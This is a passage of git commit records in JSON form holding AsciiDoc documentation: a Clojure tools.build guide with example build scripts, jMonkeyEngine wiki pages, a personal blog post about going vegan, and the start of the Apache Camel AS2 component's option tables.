class-dir})\n (b\/jar {:class-dir class-dir\n :jar-file jar-file}))\n----\n\nSome things to notice:\n\n* This is just normal Clojure code - you can load this namespace in your editor and develop it interactively at the REPL.\n* As a single-purpose program, it's fine to build shared data in the set of vars at the top.\n* We are choosing to build in the \"target\" directory and assemble the jar contents in \"target\/classes\" but there is nothing special about these paths - it is fully in your control. Also, we've repeated those paths and others in multiple places here but you can remove that duplication to the extent that feels right.\n* We've used the tools.build task functions to assemble larger functions like `build\/jar` for the user to invoke. These functions take a parameter map and we've chosen not to provide any configurable parameters here, but you could!\n\nThe deps.edn file will look like this:\n\n[source,clojure]\n----\n{:paths [\"src\"]\n :aliases\n {:build {:deps {io.github.clojure\/tools.build {:git\/tag \"TAG\" :git\/sha \"SHA\"}}\n :ns-default build}}}\n----\n\nAnd then you can run this build with:\n\n[source,shell]\n----\nclj -T:build clean\nclj -T:build jar\n----\n\nWe expect to be able to do these both together on the command line but that is a work in progress.\n\n== Compiled uberjar application build\n\nWhen preparing an application, it is common to compile the full app + libs and assemble the entire thing as a single uberjar.\n\nIt is important that your main Clojure namespace should have `(:gen-class)`, for example:\n\n[source,clojure]\n----\n(ns my.lib.main\n ;; any :require and\/or :import clauses\n (:gen-class))\n----\n\nAnd that namespace should have a function like:\n\n[source,clojure]\n----\n(defn -main [& args]\n (do-stuff))\n----\n\nAn example build for a compiled uberjar will look like this:\n\n[source,clojure]\n----\n(ns build\n (:require [clojure.tools.build.api :as b]))\n\n(def lib 'my\/lib1)\n(def version (format \"1.2.%s\" (b\/git-count-revs nil)))\n(def class-dir \"target\/classes\")\n(def basis (b\/create-basis {:project \"deps.edn\"}))\n(def uber-file (format \"target\/%s-%s-standalone.jar\" (name lib) version))\n\n(defn clean [_]\n (b\/delete {:path \"target\"}))\n\n(defn uber [_]\n (clean nil)\n (b\/copy-dir {:src-dirs [\"src\" \"resources\"]\n :target-dir class-dir})\n (b\/compile-clj {:basis basis\n :src-dirs [\"src\"]\n :class-dir class-dir})\n (b\/uber {:class-dir class-dir\n :uber-file uber-file\n :basis basis\n :main 'my.lib.main}))\n----\n\nThe deps.edn and build execution will look the same as the prior example.\n\nYou can create the uber jar build with:\n\n[source]\n----\nclj -T:build uber\n----\n\nThe output of this build will be an uberjar at `target\/lib1-1.2.100-standalone.jar`. That jar contains both a compiled version of this project and all of its dependencies. The uberjar will have a manifest referring to the `my.lib.main` namespace (which should have a `-main` method) and can be invoked like this:\n\n[source]\n----\njava -jar target\/lib1-1.2.100-standalone.jar\n----\n\n== Parameterized builds\n\nIn the builds above we did not parameterize any aspect of the build, just chose which functions to call. You may find that it's useful to parameterize your builds to differentiate dev\/qa\/prod, or version, or some other factor. To account for function chaining at the command line, it is advisable to establish the common set of parameters to use across your build functions and have each function pass the parameters along.\n\nFor example, consider a parameterization that includes an extra set of dev resources to set a local developer environment. We'll use a simple `:env :dev` kv pair to indicate this:\n\n[source,clojure]\n----\n(ns build\n (:require [clojure.tools.build.api :as b]))\n\n(def lib 'my\/lib1)\n(def version (format \"1.2.%s\" (b\/git-count-revs nil)))\n(def class-dir \"target\/classes\")\n(def basis (b\/create-basis {:project \"deps.edn\"}))\n(def jar-file (format \"target\/%s-%s.jar\" (name lib) version))\n(def copy-srcs [\"src\" \"resources\"])\n\n(defn clean [params]\n (b\/delete {:path \"target\"})\n params)\n\n(defn jar [{:keys [env] :as params}]\n (let [srcs (if (= env :dev) (cons \"dev-resources\" copy-srcs) copy-srcs)]\n (b\/write-pom {:class-dir class-dir\n :lib lib\n :version version\n :basis basis\n :src-dirs [\"src\"]})\n (b\/copy-dir {:src-dirs srcs\n :target-dir class-dir})\n (b\/jar {:class-dir class-dir\n :jar-file jar-file})\n params))\n----\n\nThe other aspects of deps.edn and invocation remain the same. \n\nInvocation that activates :dev environment will look like this:\n\n[source,shell]\n----\nclj -T:build jar :env :dev\n----\n\nThe kv params are passed to the `jar` function.\n\n== Mixed Java \/ Clojure build\n\nA common case that occurs is needing to introduce a Java implementation class or two into a mostly Clojure project. In this case, you need to compile the Java classes and include them with your Clojure source. In this setup, we'll assume that your Clojure source is in `src\/` and Java source is in `java\/` (where you actually put these is of course up to you).\n\nThis build creates a jar with classes compiled from Java sources and your Clojure sources.\n\n[source,clojure]\n----\n(ns build\n (:require [clojure.tools.build.api :as b]))\n\n(def lib 'my\/lib1)\n(def version (format \"1.2.%s\" (b\/git-count-revs nil)))\n(def class-dir \"target\/classes\")\n(def basis (b\/create-basis {:project \"deps.edn\"}))\n(def jar-file (format \"target\/%s-%s.jar\" (name lib) version))\n\n(defn clean [_]\n (b\/delete {:path \"target\"}))\n\n(defn compile [_]\n (b\/javac {:src-dirs [\"java\"]\n :class-dir class-dir\n :basis basis\n :javac-opts [\"-source\" \"8\" \"-target\" \"8\"]}))\n\n(defn jar [_]\n (compile nil)\n (b\/write-pom {:class-dir class-dir\n :lib lib\n :version version\n :basis basis\n :src-dirs [\"src\"]})\n (b\/copy-dir {:src-dirs [\"src\" \"resources\"]\n :target-dir class-dir})\n (b\/jar {:class-dir class-dir\n :jar-file jar-file}))\n----\n\nThe `compile` task here can also be used as the <<deps_and_cli#prep_libs,prep task>> for this lib.\n\n== Task documentation\n\nSee the https:\/\/clojure.github.io\/tools.build[API docs] for detailed task documentation.\n","old_contents":"= tools.build Guide\nAlex Miller\n2021-06-22\n:type: guides\n:toc: macro\n:icons: font\n\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\ntoc::[]\n\nhttps:\/\/github.com\/clojure\/tools.build[tools.build] is a library of functions for building Clojure projects. It is intended to be used in a build program to create user-invokable target functions. Also see the https:\/\/clojure.github.io\/tools.build[API docs].\n\n== Builds are programs\n\nThe philosophy behind tools.build is that your project build is inherently a program - a series of instructions to create one or more project artifacts from your project source files. We want to write this program with our favorite programming language, Clojure, and tools.build is a library of functions commonly needed for builds that can be connected together in flexible ways. Writing a build program does take a bit more code than other declarative approaches, but can be easily extended or customized far into the future, creating a build that grows with your project.\n\n== Setup\n\nThere is no installation step - tools.build is simply a library that your build program uses. You will create an alias in your `deps.edn` that includes tools.build as a dependency and a source path to the build program. Builds are designed to be easily executed as a project \"tool\" in the Clojure CLI (with -T). In the Clojure CLI, \"tools\" are programs that provide functionality and do not use your project deps or classpath. Tools executed with `-T:an-alias` remove all project deps and paths, add `\".\"` as a path, and include any other deps or paths as defined in `:an-alias`.\n\nAs such, you will need an alias in your deps.edn that defines the build classpath and includes the path to your build source, for example:\n\n[source,clojure]\n----\n{:paths [\"src\"] ;; project paths\n :deps {} ;; project deps\n\n :aliases\n {;; Run with clj -T:build function-in-build\n :build {:deps {io.github.clojure\/tools.build {:tag \"TAG\" :sha \"SHA\"}}\n :ns-default build}}}\n----\n\nFind the most recent TAG and SHA to use at https:\/\/github.com\/clojure\/tools.build#release-information.\n\n[NOTE]\n====\nThe git dep and Clojure CLI examples in this guide assume the use of Clojure CLI 1.10.3.933 or higher.\n====\n\nAs mentioned above, running a tool with -T will create a classpath that does not include the project :paths and :deps. Using `-T:build` will use only the `:paths` and `:deps` from the `:build` alias. The root deps.edn is still included, which will pull in Clojure as well (but it would also come in as a dependency of tools.build). The `:paths` are not specified here, so no additional paths are added, however, `-T` includes the project root `\".\"` as a path by default.\n\nSo executing `clj -T:build jar` will use an effective classpath here of:\n\n* `\".\"` (added by -T)\n* org.clojure\/clojure (from the root deps.edn `:deps`) and transitive deps\n* org.clojure\/tools.build (from the `:build` alias `:deps`) and transitive deps\n\nThe `:ns-default` specifies the default Clojure namespace to find the function specified on the classpath. Because the only local path is the default `\".\"`, we should expect to find the build program at `build.clj` in the root of our project. Note that the path roots (via the `:build` alias `:paths`) and the namespace of the build program itself relative to those paths roots are fully under your control. You may wish to put them in a subdirectory of your project too.\n\nAnd then finally, on the command line we specify the function to run in the build, here `jar`. That function will be executed in the `build` namespace, and passed a map built using the same arg passing style as `-X` - args are provided as alternating keys and values.\n\nThe remainder of this guide demonstrates individual common use cases and how to satisfy them with tools.build programs.\n\n== Source library jar build\n\nThe most common Clojure build creates a jar file containing Clojure source code. To do this with tools.build we'll use the following tasks:\n\n* `create-basis` - to create a project basis\n* `copy-dir` - to copy Clojure source and resources into a working dir\n* `write-pom` - to write a pom file in the working dir\n* `jar` - to jar up the working dir into a jar file\n\nThe build.clj will look like this:\n\n[source,clojure]\n----\n(ns build\n (:require [clojure.tools.build.api :as b]))\n\n(def lib 'my\/lib1)\n(def version (format \"1.2.%s\" (b\/git-count-revs nil)))\n(def class-dir \"target\/classes\")\n(def basis (b\/create-basis {:project \"deps.edn\"}))\n(def jar-file (format \"target\/%s-%s.jar\" (name lib) version))\n\n(defn clean [_]\n (b\/delete {:path \"target\"}))\n\n(defn jar [_]\n (b\/write-pom {:class-dir class-dir\n :lib lib\n :version version\n :basis basis\n :src-dirs [\"src\"]})\n (b\/copy-dir {:src-dirs [\"src\" \"resources\"]\n :target-dir class-dir})\n (b\/jar {:class-dir class-dir\n :jar-file jar-file}))\n----\n\nSome things to notice:\n\n* This is just normal Clojure code - you can load this namespace in your editor and develop it interactively at the REPL.\n* As a single-purpose program, it's fine to build shared data in the set of vars at the top.\n* We are choosing to build in the \"target\" directory and assemble the jar contents in \"target\/classes\" but there is nothing special about these paths - it is fully in your control. Also, we've repeated those paths and others in multiple places here but you can remove that duplication to the extent that feels right.\n* We've used the tools.build task functions to assemble larger functions like `build\/jar` for the user to invoke. These functions take a parameter map and we've chosen not to provide any configurable parameters here, but you could!\n\nThe deps.edn file will look like this:\n\n[source,clojure]\n----\n{:paths [\"src\"]\n :aliases\n {:build {:deps {io.github.clojure\/tools.build {:tag \"TAG\" :sha \"SHA\"}}\n :ns-default build}}}\n----\n\nAnd then you can run this build with:\n\n[source,shell]\n----\nclj -T:build clean\nclj -T:build jar\n----\n\nWe expect to be able to do these both together on the command line but that is a work in progress.\n\n== Compiled uberjar application build\n\nWhen preparing an application, it is common to compile the full app + libs and assemble the entire thing as a single uberjar.\n\nIt is important that your main Clojure namespace should have `(:gen-class)`, for example:\n\n[source,clojure]\n----\n(ns my.lib.main\n ;; any :require and\/or :import clauses\n (:gen-class))\n----\n\nAnd that namespace should have a function like:\n\n[source,clojure]\n----\n(defn -main [& args]\n (do-stuff))\n----\n\nAn example build for a compiled uberjar will look like this:\n\n[source,clojure]\n----\n(ns build\n (:require [clojure.tools.build.api :as b]))\n\n(def lib 'my\/lib1)\n(def version (format \"1.2.%s\" (b\/git-count-revs nil)))\n(def class-dir \"target\/classes\")\n(def basis (b\/create-basis {:project \"deps.edn\"}))\n(def uber-file (format \"target\/%s-%s-standalone.jar\" (name lib) version))\n\n(defn clean [_]\n (b\/delete {:path \"target\"}))\n\n(defn uber [_]\n (clean nil)\n (b\/copy-dir {:src-dirs [\"src\" \"resources\"]\n :target-dir class-dir})\n (b\/compile-clj {:basis basis\n :src-dirs [\"src\"]\n :class-dir class-dir})\n (b\/uber {:class-dir class-dir\n :uber-file uber-file\n :basis basis\n :main 'my.lib.main}))\n----\n\nThe deps.edn and build execution will look the same as the prior example.\n\nYou can create the uber jar build with:\n\n[source]\n----\nclj -T:build uber\n----\n\nThe output of this build will be an uberjar at `target\/lib1-1.2.100-standalone.jar`. That jar contains both a compiled version of this project and all of its dependencies. The uberjar will have a manifest referring to the `my.lib.main` namespace (which should have a `-main` method) and can be invoked like this:\n\n[source]\n----\njava -jar target\/lib1-1.2.100-standalone.jar\n----\n\n== Parameterized builds\n\nIn the builds above we did not parameterize any aspect of the build, just chose which functions to call. You may find that it's useful to parameterize your builds to differentiate dev\/qa\/prod, or version, or some other factor. To account for function chaining at the command line, it is advisable to establish the common set of parameters to use across your build functions and have each function pass the parameters along.\n\nFor example, consider a parameterization that includes an extra set of dev resources to set a local developer environment. We'll use a simple `:env :dev` kv pair to indicate this:\n\n[source,clojure]\n----\n(ns build\n (:require [clojure.tools.build.api :as b]))\n\n(def lib 'my\/lib1)\n(def version (format \"1.2.%s\" (b\/git-count-revs nil)))\n(def class-dir \"target\/classes\")\n(def basis (b\/create-basis {:project \"deps.edn\"}))\n(def jar-file (format \"target\/%s-%s.jar\" (name lib) version))\n(def copy-srcs [\"src\" \"resources\"])\n\n(defn clean [params]\n (b\/delete {:path \"target\"})\n params)\n\n(defn jar [{:keys [env] :as params}]\n (let [srcs (if (= env :dev) (cons \"dev-resources\" copy-srcs) copy-srcs)]\n (b\/write-pom {:class-dir class-dir\n :lib lib\n :version version\n :basis basis\n :src-dirs [\"src\"]})\n (b\/copy-dir {:src-dirs srcs\n :target-dir class-dir})\n (b\/jar {:class-dir class-dir\n :jar-file jar-file})\n params))\n----\n\nThe other aspects of deps.edn and invocation remain the same. \n\nInvocation that activates :dev environment will look like this:\n\n[source,shell]\n----\nclj -T:build jar :env :dev\n----\n\nThe kv params are passed to the `jar` function.\n\n== Mixed Java \/ Clojure build\n\nA common case that occurs is needing to introduce a Java implementation class or two into a mostly Clojure project. In this case, you need to compile the Java classes and include them with your Clojure source. In this setup, we'll assume that your Clojure source is in `src\/` and Java source is in `java\/` (where you actually put these is of course up to you).\n\nThis build creates a jar with classes compiled from Java sources and your Clojure sources.\n\n[source,clojure]\n----\n(ns build\n (:require [clojure.tools.build.api :as b]))\n\n(def lib 'my\/lib1)\n(def version (format \"1.2.%s\" (b\/git-count-revs nil)))\n(def class-dir \"target\/classes\")\n(def basis (b\/create-basis {:project \"deps.edn\"}))\n(def jar-file (format \"target\/%s-%s.jar\" (name lib) version))\n\n(defn clean [_]\n (b\/delete {:path \"target\"}))\n\n(defn compile [_]\n (b\/javac {:src-dirs [\"java\"]\n :class-dir class-dir\n :basis basis\n :javac-opts [\"-source\" \"8\" \"-target\" \"8\"]}))\n\n(defn jar [_]\n (compile nil)\n (b\/write-pom {:class-dir class-dir\n :lib lib\n :version version\n :basis basis\n :src-dirs [\"src\"]})\n (b\/copy-dir {:src-dirs [\"src\" \"resources\"]\n :target-dir class-dir})\n (b\/jar {:class-dir class-dir\n :jar-file jar-file}))\n----\n\nThe `compile` task here can also be used as the <<deps_and_cli#prep_libs,prep task>> for this lib.\n\n== Task documentation\n\nSee the https:\/\/clojure.github.io\/tools.build[API docs] for detailed task documentation.\n","returncode":0,"stderr":"","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"b94688c8d0a5cd9c41b94803daa198c8d55cfcd5","subject":"turned link into image.","message":"turned link into image.\n","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/jme3\/rise_of_mutants_project.adoc","new_file":"src\/docs\/asciidoc\/jme3\/rise_of_mutants_project.adoc","new_contents":"= rise_of_mutants_project\n:author:\n:revnumber:\n:revdate: 2016\/03\/17 20:48\n:relfileprefix: ..\/\n:imagesdir: ..\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\n\nRise of Mutants project by BigBootsTeam.\n\nProject is hosted here: link:https:\/\/code.google.com\/p\/rise-of-mutants\/source\/list[https:\/\/code.google.com\/p\/rise-of-mutants\/source\/list]\n\nFeatures:\n\n- World Editor is Blender (export to Ogre scene).\n\n- Entity System.\n\n- Ready Framework.\n\n- Ready Gameplay.\n\n- Model Viewer tool.\n\n- LightBlow Shader is used.\n\nScreenShot: image:https:\/\/i.imgur.com\/uFRw4.jpg[https:\/\/i.imgur.com\/uFRw4.jpg]\n\nVideo:\n\nimage::jme3\/riseofmutants3.jpg[youtu.be\/_aFSEJlISyI,width=\"\",height=\"\",link=\"https:\/\/youtu.be\/_aFSEJlISyI\"]\n","old_contents":"= rise_of_mutants_project\n:author:\n:revnumber:\n:revdate: 2016\/03\/17 20:48\n:relfileprefix: ..\/\n:imagesdir: ..\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\n\nRise of Mutants project by BigBootsTeam.\n\nProject is hosted here: link:https:\/\/code.google.com\/p\/rise-of-mutants\/source\/list[https:\/\/code.google.com\/p\/rise-of-mutants\/source\/list]\n\nFeatures:\n\n- World Editor is Blender (export to Ogre scene).\n\n- Entity System.\n\n- Ready Framework.\n\n- Ready Gameplay.\n\n- Model Viewer tool.\n\n- LightBlow Shader is used.\n\nScreenShot: link:https:\/\/i.imgur.com\/uFRw4.jpg[https:\/\/i.imgur.com\/uFRw4.jpg]\n\nVideo:\n\nimage::jme3\/riseofmutants3.jpg[youtu.be\/_aFSEJlISyI,width=\"\",height=\"\",link=\"https:\/\/youtu.be\/_aFSEJlISyI\"]\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"84369abc69cb8a157dc6116cc451c1bbaf4c5aec","subject":"shorten topic","message":"shorten topic\n","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"docs\/modules\/tutorials\/nav.adoc","new_file":"docs\/modules\/tutorials\/nav.adoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"1392a227558fc234df5980bc375e141ff5b1b93d","subject":"Update 2016-09-11-Going-Vegan.adoc","message":"Update 2016-09-11-Going-Vegan.adoc","repos":"zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io","old_file":"_posts\/2016-09-11-Going-Vegan.adoc","new_file":"_posts\/2016-09-11-Going-Vegan.adoc","new_contents":"= Going Vegan!\n\n:hp-tags: [vegan]\n\nMy name is Roxanne Joncas. I am Canadian living in Kiel, Germany. For the past two years, I have been a \"vegepreferian\" (term coined by my friend Wayne) that indulges in minimalism. I have decided to make my lifestyle a more sensible, mindful, and conscious one. That is why I have decided to become vegan. I will be posting my journey on my https:\/\/www.youtube.com\/channel\/UC3u3YZ35NU1Zl3zxRH3d7OA[YouTube Channel].\n\nJoin in on the fun, follow my journey or become a vegan and share your though\nts\/ideas!\n\n++++\n<iframe width=\"560\" height=\"315\" src=\"https:\/\/www.youtube.com\/embed\/jZylH73e-lA\" frameborder=\"0\" allowfullscreen><\/iframe>\n++++","old_contents":"= Going Vegan!\n\n:hp-tags: [vegan]\n\nMy name is Roxanne Joncas. I am Canadian living in Kiel, Germany. For the past two years, I have been a \"vegepreferian\" (term coined by my friend Wayne) that indulges in minimalism. I have decided to make my lifestyle a more sensible, mindful, and conscious one. That is why I have decided to become vegan. I will be posting my journey on my https:\/\/www.youtube.com\/channel\/UC3u3YZ35NU1Zl3zxRH3d7OA[YouTube Channel].\n\nJoin in on the fun, follow my journey or become a vegan and share your thoughts\/ideas!","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"35c9478b7899e2abf8fec823e10a510cbedc13fa","subject":"Camel-AS2: Improve NOTE section","message":"Camel-AS2: Improve NOTE section\n","repos":"apache\/camel,nicolaferraro\/camel,pax95\/camel,DariusX\/camel,zregvart\/camel,tadayosi\/camel,mcollovati\/camel,pax95\/camel,CodeSmell\/camel,cunningt\/camel,apache\/camel,nicolaferraro\/camel,mcollovati\/camel,gnodet\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,mcollovati\/camel,zregvart\/camel,pax95\/camel,cunningt\/camel,tdiesler\/camel,CodeSmell\/camel,pax95\/camel,tdiesler\/camel,ullgren\/camel,pax95\/camel,DariusX\/camel,alvinkwekel\/camel,alvinkwekel\/camel,adessaigne\/camel,tadayosi\/camel,tadayosi\/camel,CodeSmell\/camel,DariusX\/camel,pmoerenhout\/camel,alvinkwekel\/camel,apache\/camel,pmoerenhout\/camel,ullgren\/camel,christophd\/camel,ullgren\/camel,nicolaferraro\/camel,zregvart\/camel,tdiesler\/camel,nikhilvibhav\/camel,nikhilvibhav\/camel,christophd\/camel,ullgren\/camel,gnodet\/camel,DariusX\/camel,pmoerenhout\/camel,tadayosi\/camel,adessaigne\/camel,cunningt\/camel,adessaigne\/camel,adessaigne\/camel,nikhilvibhav\/camel,gnodet\/camel,tadayosi\/camel,christophd\/camel,CodeSmell\/camel,tdiesler\/camel,adessaigne\/camel,christophd\/camel,apache\/camel,christophd\/camel,zregvart\/camel,pmoerenhout\/camel,nicolaferraro\/camel,christophd\/camel,pmoerenhout\/camel,alvinkwekel\/camel,apache\/camel,tadayosi\/camel,cunningt\/camel,tdiesler\/camel,cunningt\/camel,tdiesler\/camel,gnodet\/camel,gnodet\/camel,cunningt\/camel,pax95\/camel,mcollovati\/camel,apache\/camel,adessaigne\/camel","old_file":"components\/camel-as2\/camel-as2-component\/src\/main\/docs\/as2-component.adoc","new_file":"components\/camel-as2\/camel-as2-component\/src\/main\/docs\/as2-component.adoc","new_contents":"[[as2-component]]\n= AS2 Component\n\n*Since Camel 2.22*\n\n\/\/ HEADER START\n*Both producer and consumer is supported*\n\/\/ HEADER END\n\nThe AS2 component provides transport of EDI messages using the HTTP transfer protocol\nas specified in https:\/\/tools.ietf.org\/html\/rfc4130[RFC4130]. \n\n[NOTE]\n====\nThis component is currently a work in progress. Expect URI options and path and query parameters to change in future versions of this component.\n==== \n\nMaven users will need to add the following dependency to their pom.xml\nfor this component:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-as2<\/artifactId>\n <version>x.x.x<\/version>\n <!-- use the same version as your Camel core version -->\n<\/dependency>\n----\n\n== URI format\n\n[source]\n----\nas2:\/\/apiName\/methodName\n----\n\napiName can be one of:\n\n* client\n* server\n\n\n== AS2 Options\n\n\n\/\/ component options: START\nThe AS2 component supports 4 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *configuration* (common) | To use the shared configuration | | AS2Configuration\n| *basicPropertyBinding* (advanced) | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n|===\n\/\/ component options: END\n\n\n\/\/ endpoint options: START\nThe AS2 endpoint is configured using URI syntax:\n\n----\nas2:apiName\/methodName\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (2 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *apiName* | *Required* What kind of operation to perform | | AS2ApiName\n| *methodName* | *Required* What sub operation to use for the selected operation | | String\n|===\n\n\n=== Query Parameters (49 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *as2From* (common) | The value of the AS2From header of AS2 message. | | String\n| *as2MessageStructure* (common) | The structure of AS2 Message. One of: PLAIN - No encryption, no signature, SIGNED - No encryption, signature, ENCRYPTED - Encryption, no signature, ENCRYPTED_SIGNED - Encryption, signature | | AS2MessageStructure\n| *as2To* (common) | The value of the AS2To header of AS2 message. | | String\n| *as2Version* (common) | The version of the AS2 protocol. | 1.1 | String\n| *clientFqdn* (common) | The Client Fully Qualified Domain Name (FQDN). Used in message ids sent by endpoint. | camel.apache.org | String\n| *compressionAlgorithm* (common) | The algorithm used to compress EDI message. | | AS2CompressionAlgorithm\n| *decryptingPrivateKey* (common) | The key used to encrypt the EDI message. | | PrivateKey\n| *dispositionNotificationTo* (common) | The value of the Disposition-Notification-To header. Assigning a value to this parameter requests a message disposition notification (MDN) for the AS2 message. | | String\n| *ediMessageTransferEncoding* (common) | The transfer encoding of EDI message. | | String\n| *ediMessageType* (common) | The content type of EDI message. One of application\/edifact, application\/edi-x12, application\/edi-consent | | ContentType\n| *encryptingAlgorithm* (common) | The algorithm used to encrypt EDI message. | | AS2EncryptionAlgorithm\n| *encryptingCertificateChain* (common) | The chain of certificates used to encrypt EDI message. | | Certificate[]\n| *from* (common) | The value of the From header of AS2 message. | | String\n| *inBody* (common) | Sets the name of a parameter to be passed in the exchange In Body | | String\n| *mdnMessageTemplate* (common) | The template used to format MDN message | | String\n| *requestUri* (common) | The request URI of EDI message. | \/ | String\n| *server* (common) | The value included in the Server message header identifying the AS2 Server. | Camel AS2 Server Endpoint | String\n| *serverFqdn* (common) | The Server Fully Qualified Domain Name (FQDN). Used in message ids sent by endpoint. | camel.apache.org | String\n| *serverPortNumber* (common) | The port number of server. | | Integer\n| *signedReceiptMicAlgorithms* (common) | The list of algorithms, in order of preference, requested to generate a message integrity check (MIC) returned in message dispostion notification (MDN) | | String[]\n| *signingAlgorithm* (common) | The algorithm used to sign EDI message. | | AS2SignatureAlgorithm\n| *signingCertificateChain* (common) | The chain of certificates used to sign EDI message. | | Certificate[]\n| *signingPrivateKey* (common) | The key used to sign the EDI message. | | PrivateKey\n| *subject* (common) | The value of Subject header of AS2 message. | | String\n| *targetHostname* (common) | The host name (IP or DNS name) of target host. | | String\n| *targetPortNumber* (common) | The port number of target host. -1 indicates the scheme default port. | | Integer\n| *userAgent* (common) | The value included in the User-Agent message header identifying the AS2 user agent. | Camel AS2 Client Endpoint | String\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n| *sendEmptyMessageWhenIdle* (consumer) | If the polling consumer did not poll any files, you can enable this option to send an empty message (no body) instead. | false | boolean\n| *exceptionHandler* (consumer) | To let the consumer use a custom ExceptionHandler. Notice if the option bridgeErrorHandler is enabled then this option is not in use. By default the consumer will deal with exceptions, that will be logged at WARN or ERROR level and ignored. | | ExceptionHandler\n| *exchangePattern* (consumer) | Sets the exchange pattern when the consumer creates an exchange. | | ExchangePattern\n| *pollStrategy* (consumer) | A pluggable org.apache.camel.PollingConsumerPollingStrategy allowing you to provide your custom implementation to control error handling usually occurred during the poll operation before an Exchange have been created and being routed in Camel. | | PollingConsumerPollStrategy\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *basicPropertyBinding* (advanced) | Whether the endpoint should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). | false | boolean\n| *backoffErrorThreshold* (scheduler) | The number of subsequent error polls (failed due some error) that should happen before the backoffMultipler should kick-in. | | int\n| *backoffIdleThreshold* (scheduler) | The number of subsequent idle polls that should happen before the backoffMultipler should kick-in. | | int\n| *backoffMultiplier* (scheduler) | To let the scheduled polling consumer backoff if there has been a number of subsequent idles\/errors in a row. The multiplier is then the number of polls that will be skipped before the next actual attempt is happening again. When this option is in use then backoffIdleThreshold and\/or backoffErrorThreshold must also be configured. | | int\n| *delay* (scheduler) | Milliseconds before the next poll. You can also specify time values using units, such as 60s (60 seconds), 5m30s (5 minutes and 30 seconds), and 1h (1 hour). | 500 | long\n| *greedy* (scheduler) | If greedy is enabled, then the ScheduledPollConsumer will run immediately again, if the previous run polled 1 or more messages. | false | boolean\n| *initialDelay* (scheduler) | Milliseconds before the first poll starts. You can also specify time values using units, such as 60s (60 seconds), 5m30s (5 minutes and 30 seconds), and 1h (1 hour). | 1000 | long\n| *repeatCount* (scheduler) | Specifies a maximum limit of number of fires. So if you set it to 1, the scheduler will only fire once. If you set it to 5, it will only fire five times. A value of zero or negative means fire forever. | 0 | long\n| *runLoggingLevel* (scheduler) | The consumer logs a start\/complete log line when it polls. This option allows you to configure the logging level for that. | TRACE | LoggingLevel\n| *scheduledExecutorService* (scheduler) | Allows for configuring a custom\/shared thread pool to use for the consumer. By default each consumer has its own single threaded thread pool. | | ScheduledExecutorService\n| *scheduler* (scheduler) | To use a cron scheduler from either camel-spring or camel-quartz component | none | String\n| *schedulerProperties* (scheduler) | To configure additional properties when using a custom scheduler or any of the Quartz, Spring based scheduler. | | Map\n| *startScheduler* (scheduler) | Whether the scheduler should be auto started. | true | boolean\n| *timeUnit* (scheduler) | Time unit for initialDelay and delay options. | MILLISECONDS | TimeUnit\n| *useFixedDelay* (scheduler) | Controls if fixed delay or fixed rate is used. See ScheduledExecutorService in JDK for details. | true | boolean\n|===\n\/\/ endpoint options: END\n\/\/ spring-boot-auto-configure options: START\n== Spring Boot Auto-Configuration\n\nWhen using Spring Boot make sure to use the following Maven dependency to have support for auto configuration:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.apache.camel.springboot<\/groupId>\n <artifactId>camel-as2-starter<\/artifactId>\n <version>x.x.x<\/version>\n <!-- use the same version as your Camel core version -->\n<\/dependency>\n----\n\n\nThe component supports 32 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | 